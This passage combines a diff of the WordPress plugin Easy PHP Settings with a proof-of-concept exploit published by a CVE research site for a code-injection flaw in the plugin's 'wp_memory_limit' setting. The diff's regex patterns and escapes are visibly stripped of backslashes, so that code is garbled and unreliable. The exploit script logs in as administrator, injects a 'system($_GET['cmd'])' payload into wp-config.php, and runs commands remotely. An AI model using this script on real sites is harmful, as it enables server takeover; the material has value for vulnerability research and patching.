+			}
+		}
+
+		// Check for balanced parentheses and quotes (basic syntax check).
+		$open_parens  = substr_count( $content, '(' );
+		$close_parens = substr_count( $content, ')' );
+		if ( $open_parens !== $close_parens ) {
+			return new WP_Error( 'unbalanced_parens', __( 'Unbalanced parentheses detected in config file.', 'easy-php-settings' ) );
+		}
+
+		return true;
+	}
+}
+
--- a/easy-php-settings/includes/class-easy-config-parser.php
+++ b/easy-php-settings/includes/class-easy-config-parser.php
@@ -0,0 +1,185 @@
+<?php
+/**
+ * Config Parser class for easy-php-settings plugin
+ *
+ * @package EasyPHPSettings
+ * @since 1.0.5
+ */
+
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+/**
+ * Easy_Config_Parser class
+ *
+ * Safely parses and modifies wp-config.php file using token-based parsing.
+ *
+ * @package EasyPHPSettings
+ * @since 1.0.5
+ */
+class Easy_Config_Parser {
+
+	/**
+	 * Constructor
+	 */
+	private function __construct() {}
+
+	/**
+	 * Update or add a constant definition in wp-config.php
+	 *
+	 * @param string $config_content The current config file content.
+	 * @param string $constant_name The constant name (e.g., 'WP_DEBUG').
+	 * @param mixed  $value The value to set (will be converted to string).
+	 * @param string $type The type of value ('bool', 'string', 'int').
+	 * @return string|WP_Error Modified config content or WP_Error on failure.
+	 */
+	public static function update_constant( $config_content, $constant_name, $value, $type = 'bool' ) {
+		// Validate constant name.
+		if ( ! preg_match( '/^[A-Z_][A-Z0-9_]*$/', $constant_name ) ) {
+			return new WP_Error( 'invalid_constant_name', __( 'Invalid constant name.', 'easy-php-settings' ) );
+		}
+
+		// Format value based on type.
+		$formatted_value = self::format_constant_value( $value, $type );
+
+		// Try to find and replace existing constant.
+		$patterns = array(
+			// Pattern 1: define( 'CONSTANT', value );
+			'/defines*(s*['"]' . preg_quote( $constant_name, '/' ) . '['"]s*,s*[^;]+?)s*;/i',
+			// Pattern 2: define( "CONSTANT", value );
+			'/defines*(s*["']' . preg_quote( $constant_name, '/' ) . '["']s*,s*[^;]+?)s*;/i',
+		);
+
+		$replaced = false;
+		foreach ( $patterns as $pattern ) {
+			if ( preg_match( $pattern, $config_content ) ) {
+				$replacement = "define( '{$constant_name}', {$formatted_value} );";
+				$config_content = preg_replace( $pattern, $replacement, $config_content );
+				$replaced = true;
+				break;
+			}
+		}
+
+		// If constant doesn't exist, add it before the "stop editing" comment.
+		if ( ! $replaced ) {
+			$new_constant = "ndefine( '{$constant_name}', {$formatted_value} );n";
+			$stop_comment = "/* That's all, stop editing!";
+
+			if ( strpos( $config_content, $stop_comment ) !== false ) {
+				$config_content = str_replace( $stop_comment, $new_constant . $stop_comment, $config_content );
+			} else {
+				// If no stop comment, add before the closing PHP tag or at the end.
+				if ( preg_match( '/?>s*$/', $config_content ) ) {
+					$config_content = preg_replace( '/?>s*$/', $new_constant . "n?>n", $config_content );
+				} else {
+					$config_content .= $new_constant;
+				}
+			}
+		}
+
+		// Validate the modified content.
+		$validation = Easy_Config_Backup::validate_config_structure( $config_content );
+		if ( is_wp_error( $validation ) ) {
+			return $validation;
+		}
+
+		return $config_content;
+	}
+
+	/**
+	 * Format constant value based on type
+	 *
+	 * @param mixed  $value The value to format.
+	 * @param string $type The type ('bool', 'string', 'int').
+	 * @return string Formatted value string.
+	 */
+	private static function format_constant_value( $value, $type ) {
+		switch ( $type ) {
+			case 'bool':
+				return $value ? 'true' : 'false';
+
+			case 'string':
+				// Security: Validate string value to prevent code injection
+				// Only allow safe characters: digits and K/M/G/T units
+				$trimmed_value = trim( (string) $value );
+				if ( ! preg_match( '/^(d+)([KMGT]?)$/i', $trimmed_value ) ) {
+					// If invalid, return empty string to prevent injection
+					return "''";
+				}
+				// Re-sanitize to ensure no malicious characters
+				$sanitized = preg_replace( '/[^0-9KMGT]/i', '', $trimmed_value );
+				// Escape single quotes and wrap in quotes.
+				$escaped = str_replace( array( '\', "'" ), array( '\\', "\'" ), $sanitized );
+				return "'{$escaped}'";
+
+			case 'int':
+				return (string) intval( $value );
+
+			default:
+				// Default to string with validation.
+				$trimmed_value = trim( (string) $value );
+				if ( ! preg_match( '/^(d+)([KMGT]?)$/i', $trimmed_value ) ) {
+					// If invalid, return empty string to prevent injection
+					return "''";
+				}
+				// Re-sanitize to ensure no malicious characters
+				$sanitized = preg_replace( '/[^0-9KMGT]/i', '', $trimmed_value );
+				$escaped = str_replace( array( '\', "'" ), array( '\\', "\'" ), $sanitized );
+				return "'{$escaped}'";
+		}
+	}
+
+	/**
+	 * Get constant value from config file
+	 *
+	 * @param string $config_content The config file content.
+	 * @param string $constant_name The constant name.
+	 * @return mixed|null The constant value or null if not found.
+	 */
+	public static function get_constant_value( $config_content, $constant_name ) {
+		$patterns = array(
+			'/defines*(s*['"]' . preg_quote( $constant_name, '/' ) . '['"]s*,s*([^;]+?))s*;/i',
+		);
+
+		foreach ( $patterns as $pattern ) {
+			if ( preg_match( $pattern, $config_content, $matches ) ) {
+				$value = trim( $matches[1] );
+				// Remove quotes if present.
+				$value = trim( $value, ''"' );
+				// Convert boolean strings.
+				if ( 'true' === strtolower( $value ) ) {
+					return true;
+				}
+				if ( 'false' === strtolower( $value ) ) {
+					return false;
+				}
+				return $value;
+			}
+		}
+
+		return null;
+	}
+
+	/**
+	 * Check if constant exists in config file
+	 *
+	 * @param string $config_content The config file content.
+	 * @param string $constant_name The constant name.
+	 * @return bool True if constant exists, false otherwise.
+	 */
+	public static function constant_exists( $config_content, $constant_name ) {
+		$patterns = array(
+			'/defines*(s*['"]' . preg_quote( $constant_name, '/' ) . '['"]/i',
+		);
+
+		foreach ( $patterns as $pattern ) {
+			if ( preg_match( $pattern, $config_content ) ) {
+				return true;
+			}
+		}
+
+		return false;
+	}
+}
+
--- a/easy-php-settings/includes/class-easy-error-handler.php
+++ b/easy-php-settings/includes/class-easy-error-handler.php
@@ -0,0 +1,197 @@
+<?php
+/**
+ * Error Handler class for easy-php-settings plugin
+ *
+ * @package EasyPHPSettings
+ * @since 1.0.5
+ */
+
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+/**
+ * Easy_Error_Handler class
+ *
+ * Handles error logging and user-friendly error messages.
+ *
+ * @package EasyPHPSettings
+ * @since 1.0.5
+ */
+class Easy_Error_Handler {
+
+	/**
+	 * Log option key
+	 *
+	 * @var string
+	 */
+	const LOG_OPTION_KEY = 'easy_php_settings_error_log';
+
+	/**
+	 * Maximum log entries
+	 *
+	 * @var int
+	 */
+	const MAX_LOG_ENTRIES = 100;
+
+	/**
+	 * Constructor
+	 */
+	private function __construct() {}
+
+	/**
+	 * Log an error
+	 *
+	 * @param string $message Error message.
+	 * @param string $context Additional context.
+	 * @param string $level Error level (error, warning, notice).
+	 * @return void
+	 */
+	public static function log_error( $message, $context = '', $level = 'error' ) {
+		$log_entry = array(
+			'timestamp' => current_time( 'mysql' ),
+			'level'     => $level,
+			'message'   => $message,
+			'context'   => $context,
+			'user_id'   => get_current_user_id(),
+			'ip'        => self::get_client_ip(),
+		);
+
+		$logs = self::get_logs();
+		array_unshift( $logs, $log_entry );
+
+		// Keep only the most recent entries.
+		if ( count( $logs ) > self::MAX_LOG_ENTRIES ) {
+			$logs = array_slice( $logs, 0, self::MAX_LOG_ENTRIES );
+		}
+
+		// Save logs.
+		if ( is_multisite() ) {
+			update_site_option( self::LOG_OPTION_KEY, $logs );
+		} else {
+			update_option( self::LOG_OPTION_KEY, $logs );
+		}
+
+		// Also log to WordPress debug log if enabled.
+		if ( defined( 'WP_DEBUG' ) && WP_DEBUG && defined( 'WP_DEBUG_LOG' ) && WP_DEBUG_LOG ) {
+			$log_message = sprintf(
+				'[Easy PHP Settings] [%s] %s',
+				strtoupper( $level ),
+				$message
+			);
+			if ( ! empty( $context ) ) {
+				$log_message .= ' Context: ' . $context;
+			}
+			error_log( $log_message );
+		}
+	}
+
+	/**
+	 * Get all logs
+	 *
+	 * @param int $limit Maximum number of logs to return.
+	 * @return array Array of log entries.
+	 */
+	public static function get_logs( $limit = 50 ) {
+		$logs = is_multisite() ? get_site_option( self::LOG_OPTION_KEY, array() ) : get_option( self::LOG_OPTION_KEY, array() );
+		if ( ! is_array( $logs ) ) {
+			return array();
+		}
+		return array_slice( $logs, 0, $limit );
+	}
+
+	/**
+	 * Clear logs
+	 *
+	 * @return bool True on success.
+	 */
+	public static function clear_logs() {
+		if ( is_multisite() ) {
+			return delete_site_option( self::LOG_OPTION_KEY );
+		}
+		return delete_option( self::LOG_OPTION_KEY );
+	}
+
+	/**
+	 * Handle an exception and log it
+	 *
+	 * @param Exception|Error $exception The exception to handle.
+	 * @param string          $context Additional context.
+	 * @return void
+	 */
+	public static function handle_exception( $exception, $context = '' ) {
+		$message = sprintf(
+			'Exception: %s in %s on line %d',
+			$exception->getMessage(),
+			$exception->getFile(),
+			$exception->getLine()
+		);
+		self::log_error( $message, $context, 'error' );
+	}
+
+	/**
+	 * Get user-friendly error message
+	 *
+	 * @param WP_Error|Exception|Error|string $error The error object or message.
+	 * @return string User-friendly error message.
+	 */
+	public static function get_user_message( $error ) {
+		if ( is_wp_error( $error ) ) {
+			return $error->get_error_message();
+		}
+
+		if ( $error instanceof Exception || $error instanceof Error ) {
+			// Don't expose file paths to users.
+			return __( 'An error occurred. Please check the error log for details.', 'easy-php-settings' );
+		}
+
+		return is_string( $error ) ? $error : __( 'An unknown error occurred.', 'easy-php-settings' );
+	}
+
+	/**
+	 * Get client IP address
+	 *
+	 * @return string IP address.
+	 */
+	private static function get_client_ip() {
+		$ip_keys = array(
+			'HTTP_CF_CONNECTING_IP', // Cloudflare.
+			'HTTP_X_REAL_IP', // Nginx proxy.
+			'HTTP_X_FORWARDED_FOR',
+			'REMOTE_ADDR',
+		);
+
+		foreach ( $ip_keys as $key ) {
+			if ( ! empty( $_SERVER[ $key ] ) ) {
+				$ip = sanitize_text_field( wp_unslash( $_SERVER[ $key ] ) );
+				// Handle comma-separated IPs (X-Forwarded-For).
+				if ( strpos( $ip, ',' ) !== false ) {
+					$ip = explode( ',', $ip );
+					$ip = trim( $ip[0] );
+				}
+				if ( filter_var( $ip, FILTER_VALIDATE_IP ) ) {
+					return $ip;
+				}
+			}
+		}
+
+		return '0.0.0.0';
+	}
+
+	/**
+	 * Add settings error with logging
+	 *
+	 * @param string $setting The setting slug.
+	 * @param string $code Error code.
+	 * @param string $message Error message.
+	 * @param string $type Message type (error, warning, updated).
+	 * @return void
+	 */
+	public static function add_settings_error( $setting, $code, $message, $type = 'error' ) {
+		add_settings_error( $setting, $code, $message, $type );
+		if ( 'error' === $type ) {
+			self::log_error( $message, "Setting: {$setting}, Code: {$code}", 'error' );
+		}
+	}
+}
+
--- a/easy-php-settings/includes/class-easy-extensions-viewer.php
+++ b/easy-php-settings/includes/class-easy-extensions-viewer.php
@@ -40,6 +40,12 @@
 	 * @return array
 	 */
 	public static function get_categorized_extensions() {
+		// Check cache first.
+		$cached = Easy_Settings_Cache::get( 'extensions' );
+		if ( false !== $cached ) {
+			return $cached;
+		}
+
 		$loaded = self::get_loaded_extensions();

 		$categories = array(
@@ -82,6 +88,9 @@
 			}
 		}

+		// Cache the result.
+		Easy_Settings_Cache::set( 'extensions', $categorized );
+
 		return $categorized;
 	}

--- a/easy-php-settings/includes/class-easy-php-settings.php
+++ b/easy-php-settings/includes/class-easy-php-settings.php
@@ -0,0 +1,1235 @@
+<?php
+/**
+ * Plugin Name: Easy PHP Settings
+ * Plugin URI:  https://github.com/easy-php-settings
+ * Description: An easy way to manage common PHP INI settings from the WordPress admin panel.
+ * Version:     1.0.4
+ * Author:      H M Shahadul Islam
+ * Author URI:  https://github.com/shahadul878
+ * License:     GPL-2.0+
+ * License URI: http://www.gnu.org/licenses/gpl-2.0.txt
+ * Text Domain: easy-php-settings
+ * Domain Path: /languages
+ *
+ * @package EasyPHPSettings
+ */
+
+// If this file is called directly, abort.
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+
+// Classes are now loaded via the main plugin file.
+
+/**
+ * Class Easy_PHP_Settings
+ *
+ * Handles the easy configuration of PHP settings.
+ */
+class Easy_PHP_Settings {
+	/**
+	 * Settings Key
+	 *
+	 * @var string[] $settings_key .
+	 */
+	private $settings_keys = array(
+		'memory_limit',
+		'upload_max_filesize',
+		'post_max_size',
+		'max_execution_time',
+		'max_input_vars',
+	);
+
+	/**
+	 * WordPress Memory Settings Keys
+	 *
+	 * @var string[] $wp_memory_settings_keys .
+	 */
+	private $wp_memory_settings_keys = array(
+		'wp_memory_limit',
+		'wp_max_memory_limit',
+	);
+
+	/**
+	 * Settings Recommended Value
+	 *
+	 * @var string[] $recommended_values
+	 */
+	private $recommended_values = array(
+		'memory_limit'        => '256M',
+		'upload_max_filesize' => '128M',
+		'post_max_size'       => '256M',
+		'max_execution_time'  => '300',
+		'max_input_vars'      => '10000',
+	);
+
+	/**
+	 * WordPress Memory Settings Recommended Values
+	 *
+	 * @var string[] $wp_memory_recommended_values
+	 */
+	private $wp_memory_recommended_values = array(
+		'wp_memory_limit'     => '256M',
+		'wp_max_memory_limit' => '512M',
+	);
+
+	/**
+	 * Version
+	 *
+	 * @var string
+	 */
+	private $version = '1.0.4';
+
+	/**
+	 * Setting tooltips
+	 *
+	 * @var array
+	 */
+	private $setting_tooltips = array();
+
+	/**
+	 * Quick presets
+	 *
+	 * @var array
+	 */
+	private $quick_presets = array();
+
+	/**
+	 * Settings API instance
+	 *
+	 * @var Easy_PHP_Settings_API
+	 */
+	private $settings_api;
+
+	/**
+	 * Export Import Handler instance
+	 *
+	 * @var Easy_PHP_Settings_Export_Import_Handler
+	 */
+	private $export_import_handler;
+
+	/**
+	 * Reset Handler instance
+	 *
+	 * @var Easy_PHP_Settings_Reset_Handler
+	 */
+	private $reset_handler;
+
+	/**
+	 *  Initializes plugin settings.
+	 */
+	public function __construct() {
+		$this->init_tooltips();
+		$this->quick_presets = Easy_PHP_Settings_Presets::get_presets();
+
+		// Initialize Settings API.
+		$this->settings_api = new Easy_PHP_Settings_API(
+			$this->settings_keys,
+			$this->wp_memory_settings_keys,
+			$this->recommended_values,
+			$this->wp_memory_recommended_values,
+			array( $this, 'get_option' ),
+			array( $this, 'update_option' )
+		);
+
+		// Initialize Export/Import Handler.
+		$this->export_import_handler = new Easy_PHP_Settings_Export_Import_Handler(
+			$this->version,
+			array( $this, 'get_capability' ),
+			array( $this, 'get_option' ),
+			array( $this, 'update_option' )
+		);
+
+		// Initialize Reset Handler.
+		$this->reset_handler = new Easy_PHP_Settings_Reset_Handler(
+			array( $this, 'get_capability' ),
+			array( $this, 'get_option' ),
+			array( $this, 'update_option' ),
+			array( $this, 'delete_option' ),
+			$this->recommended_values
+		);
+
+		$hook = is_multisite() ? 'network_admin_menu' : 'admin_menu';
+		add_action( $hook, array( $this, 'add_admin_menu' ) );
+		add_action( 'admin_init', array( $this, 'settings_init' ) );
+		add_action( 'admin_init', array( $this, 'handle_ini_file_actions' ) );
+		add_action( 'admin_init', array( $this, 'debugging_settings_init' ) );
+		add_action( 'admin_enqueue_scripts', array( $this, 'enqueue_styles' ) );
+		add_action( 'admin_init', array( $this, 'handle_log_actions' ) );
+		add_action( 'admin_init', array( $this, 'handle_export_import' ) );
+		add_action( 'admin_init', array( $this, 'handle_reset_actions' ) );
+		add_action( 'admin_init', array( $this, 'handle_history_actions' ) );
+	}
+
+	/**
+	 * Enqueue admin styles and scripts.
+	 *
+	 * @param string $hook The current admin page hook.
+	 * @return void
+	 */
+	public function enqueue_styles( $hook ) {
+		// Only load on our admin page.
+		if ( 'tools_page_easy-php-settings' !== $hook ) {
+			return;
+		}
+
+		// Enqueue code editor and settings for php.ini files.
+		$settings = wp_enqueue_code_editor( array( 'type' => 'text/x-ini' ) );
+		if ( false !== $settings ) {
+			wp_add_inline_script(
+				'code-editor',
+				sprintf( 'jQuery( function() { wp.codeEditor.initialize( "easy_php_settings_custom_php_ini", %s ); } );', wp_json_encode( $settings ) )
+			);
+		}
+
+		wp_enqueue_style(
+			'easy-php-settings-styles',
+			plugin_dir_url( __FILE__ ) . 'assets/css/admin.css',
+			array(),
+			'1.0.2'
+		);
+
+		// Enqueue admin.js and pass settings keys and strings.
+		wp_enqueue_script(
+			'easy-php-settings-admin',
+			plugin_dir_url( __FILE__ ) . 'js/admin.js',
+			array( 'jquery' ),
+			'1.0.2',
+			true
+		);
+		wp_localize_script(
+			'easy-php-settings-admin',
+			'easy_php_settingsKeys',
+			$this->settings_keys
+		);
+		wp_localize_script(
+			'easy-php-settings-admin',
+			'easy_php_settingsAdminVars',
+			array(
+				'copiedText'     => esc_html__( 'Copied to clipboard!', 'easy-php-settings' ),
+				'testCompleted'  => esc_html__( 'Settings test completed. Check the Status tab for detailed information.', 'easy-php-settings' ),
+				'noRowsSelected' => esc_html__( 'No rows selected.', 'easy-php-settings' ),
+				'presets'        => $this->quick_presets,
+				'tooltips'       => $this->setting_tooltips,
+				'ajaxurl'        => admin_url( 'admin-ajax.php' ),
+				'nonce'          => wp_create_nonce( 'easy_php_settings_ajax_nonce' ),
+			)
+		);
+	}
+
+	/**
+	 * Get Capability
+	 *
+	 * @return string
+	 */
+	public function get_capability() {
+		return Easy_PHP_Settings_Capabilities::get_capability();
+	}
+
+	/**
+	 * Get Option
+	 *
+	 * @param string $key The option key.
+	 * @param mixed  $default_value The default value.
+	 * @return false|mixed|null
+	 */
+	public function get_option( $key, $default_value = false ) {
+		return Easy_PHP_Settings_Helpers::get_option( $key, $default_value );
+	}
+
+	/**
+	 * Update Option
+	 *
+	 * @param string $key The option key.
+	 * @param mixed  $value The option value.
+	 * @return bool
+	 */
+	public function update_option( $key, $value ) {
+		return Easy_PHP_Settings_Helpers::update_option( $key, $value );
+	}
+
+	/**
+	 * Delete Option
+	 *
+	 * @param string $key The option key.
+	 * @return bool
+	 */
+	public function delete_option( $key ) {
+		return Easy_PHP_Settings_Helpers::delete_option( $key );
+	}
+
+	/**
+	 * Initialize tooltips
+	 *
+	 * @return void
+	 */
+	private function init_tooltips() {
+		$this->setting_tooltips = array(
+			'memory_limit'        => __( 'Maximum amount of memory a script may consume. Increase for large sites or complex operations.', 'easy-php-settings' ),
+			'upload_max_filesize' => __( 'Maximum size of an uploaded file. Important for media uploads.', 'easy-php-settings' ),
+			'post_max_size'       => __( 'Maximum size of POST data. Must be larger than upload_max_filesize.', 'easy-php-settings' ),
+			'max_execution_time'  => __( 'Maximum time in seconds a script is allowed to run before it is terminated.', 'easy-php-settings' ),
+			'max_input_vars'      => __( 'Maximum number of input variables accepted. Increase for large forms or page builders.', 'easy-php-settings' ),
+			'wp_memory_limit'     => __( 'WordPress memory limit for normal operations.', 'easy-php-settings' ),
+			'wp_max_memory_limit' => __( 'WordPress memory limit for admin operations (usually higher).', 'easy-php-settings' ),
+		);
+	}
+
+
+	/**
+	 * Add admin menu.
+	 *
+	 * @return void
+	 */
+	public function add_admin_menu() {
+		add_management_page(
+			__( 'PHP Settings Manager', 'easy-php-settings' ),
+			__( 'Easy PHP Settings', 'easy-php-settings' ),
+			$this->get_capability(),
+			'easy-php-settings',
+			array( $this, 'options_page_html' )
+		);
+	}
+
+	/**
+	 * Settings Init.
+	 *
+	 * @return void
+	 */
+	public function settings_init() {
+		$this->settings_api->settings_init();
+	}
+
+
+	/**
+	 * Handle INI file actions.
+	 *
+	 * @return void
+	 */
+	public function handle_ini_file_actions() {
+		if ( isset( $_POST['easy_php_settings_delete_ini_files'] ) && check_admin_referer( 'easy_php_settings_delete_ini_nonce' ) ) {
+			if ( ! current_user_can( $this->get_capability() ) ) {
+				return;
+			}
+
+			$files_deleted = Easy_PHP_Settings_File_Handler::remove_files();
+
+			if ( ! empty( $files_deleted ) ) {
+				$message = sprintf(
+					/* translators: %s: List of deleted INI file names. */
+					__( 'Successfully deleted: %s.', 'easy-php-settings' ),
+					implode( ', ', $files_deleted )
+				);
+				add_settings_error( 'easy_php_settings_settings', 'files_deleted_success', $message, 'success' );
+			} else {
+				add_settings_error( 'easy_php_settings_settings', 'files_deleted_error', __( 'Could not delete INI files. They may not exist or have permission issues.', 'easy-php-settings' ), 'warning' );
+			}
+		}
+	}
+
+	/**
+	 * Render setting field.
+	 *
+	 * @param array $args The field arguments.
+	 * @return void
+	 */
+	public function render_setting_field( $args ) {
+		$this->settings_api->render_setting_field( $args );
+	}
+
+
+
+	/**
+	 * Render WordPress memory setting field.
+	 *
+	 * @param array $args The field arguments.
+	 * @return void
+	 */
+	public function render_wp_memory_field( $args ) {
+		$this->settings_api->render_wp_memory_field( $args );
+	}
+
+
+	/**
+	 * Handle export and import actions
+	 *
+	 * @return void
+	 */
+	public function handle_export_import() {
+		$this->export_import_handler->handle_export_import();
+	}
+
+	/**
+	 * Handle reset actions
+	 *
+	 * @return void
+	 */
+	public function handle_reset_actions() {
+		$this->reset_handler->handle_reset_actions();
+	}
+
+	/**
+	 * Handle history actions
+	 *
+	 * @return void
+	 */
+	public function handle_history_actions() {
+		// Export history as CSV.
+		if ( isset( $_POST['easy_php_settings_export_history'] ) && check_admin_referer( 'easy_php_settings_history_nonce' ) ) {
+			if ( ! current_user_can( $this->get_capability() ) ) {
+				return;
+			}
+
+			$csv = Easy_PHP_Settings_History::export_as_csv();
+			header( 'Content-Type: text/csv' );
+			header( 'Content-Disposition: attachment; filename="easy-php-settings-history-' . gmdate( 'Y-m-d-His' ) . '.csv"' );
+			echo $csv; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+			exit;
+		}
+
+		// Clear history.
+		if ( isset( $_POST['easy_php_settings_clear_history'] ) && check_admin_referer( 'easy_php_settings_history_nonce' ) ) {
+			if ( ! current_user_can( $this->get_capability() ) ) {
+				return;
+			}
+
+			Easy_PHP_Settings_History::clear_history();
+			add_settings_error( 'easy_php_settings_settings', 'history_cleared', __( 'History cleared successfully.', 'easy-php-settings' ), 'updated' );
+		}
+
+		// Restore from history.
+		if ( isset( $_POST['easy_php_settings_restore_history'] ) && isset( $_POST['history_index'] ) && check_admin_referer( 'easy_php_settings_history_nonce' ) ) {
+			if ( ! current_user_can( $this->get_capability() ) ) {
+				return;
+			}
+
+			$index = intval( $_POST['history_index'] );
+			$entry = Easy_PHP_Settings_History::get_entry( $index );
+
+			if ( $entry ) {
+				// Build settings from the old values in the history entry.
+				$restored_settings = array();
+				foreach ( $entry['changes'] as $key => $change ) {
+					$restored_settings[ $key ] = $change['old'];
+				}
+
+				if ( 'php_settings' === $entry['setting_type'] ) {
+					$this->update_option( 'easy_php_settings_settings', $restored_settings );
+					add_settings_error( 'easy_php_settings_settings', 'restore_success', __( 'Settings restored from history successfully.', 'easy-php-settings' ), 'updated' );
+				}
+			} else {
+				add_settings_error( 'easy_php_settings_settings', 'restore_failed', __( 'Failed to restore settings from history.', 'easy-php-settings' ), 'error' );
+			}
+		}
+	}
+
+	/**
+	 * Options page HTML.
+	 *
+	 * @return void
+	 */
+	public function options_page_html() {
+		if ( ! current_user_can( $this->get_capability() ) ) {
+			return;
+		}
+
+		$active_tab = 'general_settings';
+		$nonce      = isset( $_GET['_wpnonce'] ) ? sanitize_key( wp_unslash( $_GET['_wpnonce'] ) ) : null;
+		if ( isset( $_GET['tab'] ) && wp_verify_nonce( $nonce, 'easy_php_settings_tab_nonce' ) ) {
+			$active_tab = sanitize_key( wp_unslash( $_GET['tab'] ) );
+		}
+
+		$tab_nonce_url = wp_create_nonce( 'easy_php_settings_tab_nonce' );
+		?>
+		<div class="wrap">
+			<h1><?php echo esc_html( get_admin_page_title() ); ?></h1>
+			<?php settings_errors(); ?>
+
+			<h2 class="nav-tab-wrapper">
+				<a href="?page=easy-php-settings&tab=general_settings&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'general_settings' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'General Settings', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=debugging&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'debugging' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'Debugging', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=php_settings&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'php_settings' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'PHP Settings', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=extensions&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'extensions' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'Extensions', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=status&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'status' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'Status', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=history&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'history' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'History', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=tools&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'tools' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'Tools', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=log_viewer&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'log_viewer' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'Log Viewer', 'easy-php-settings' ); ?></a>
+				<a href="?page=easy-php-settings&tab=pro&_wpnonce=<?php echo esc_attr( $tab_nonce_url ); ?>" class="nav-tab <?php echo 'pro' === $active_tab ? 'nav-tab-active' : ''; ?>"><?php esc_html_e( 'Pro', 'easy-php-settings' ); ?></a>
+			</h2>
+
+			<?php if ( 'general_settings' === $active_tab ) : ?>
+			<form action="options.php" method="post">
+				<?php
+				settings_fields( 'easy_php_settings' );
+				$options           = $this->get_

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3352 - Easy PHP Settings <= 1.0.4 - Authenticated (Administrator+) PHP Code Injection via 'wp_memory_limit' Setting
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'admin';
$password = 'password';
$payload = "' . system($_GET['cmd']) . '";

// Step 1: Authenticate and get WordPress nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get login page to extract nonce
$response = curl_exec($ch);
preg_match('/name="log"[^>]*>/', $response, $matches);

// Submit login credentials
$post_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => '1'
);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Step 2: Access plugin settings page to get settings nonce
$settings_url = $target_url . '/wp-admin/options-general.php?page=easy-php-settings';
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract the nonce for wp_memory_settings
preg_match('/name="easy_php_settings_wp_memory_settings_nonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Exploit the vulnerability by submitting malicious payload
$exploit_url = $target_url . '/wp-admin/options.php';
$exploit_data = array(
    'option_page' => 'easy_php_settings_wp_memory_settings',
    'action' => 'update',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/options-general.php?page=easy-php-settings',
    'easy_php_settings_wp_memory_settings[wp_memory_limit]' => $payload,
    'easy_php_settings_wp_memory_settings[wp_max_memory_limit]' => '256M',
    'submit' => 'Save Changes'
);

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$response = curl_exec($ch);

// Step 4: Verify exploitation by checking if code was injected
$config_check = $target_url . '/?cmd=id';
curl_setopt($ch, CURLOPT_URL, $config_check);
curl_setopt($ch, CURLOPT_POST, false);
$result = curl_exec($ch);

if (strpos($result, 'uid=') !== false) {
    echo "Exploit successful! Command injection verified.n";
    echo "Output: " . $result . "n";
} else {
    echo "Exploit may have failed. Check manually.n";
}

curl_close($ch);
unlink('cookies.txt');

?>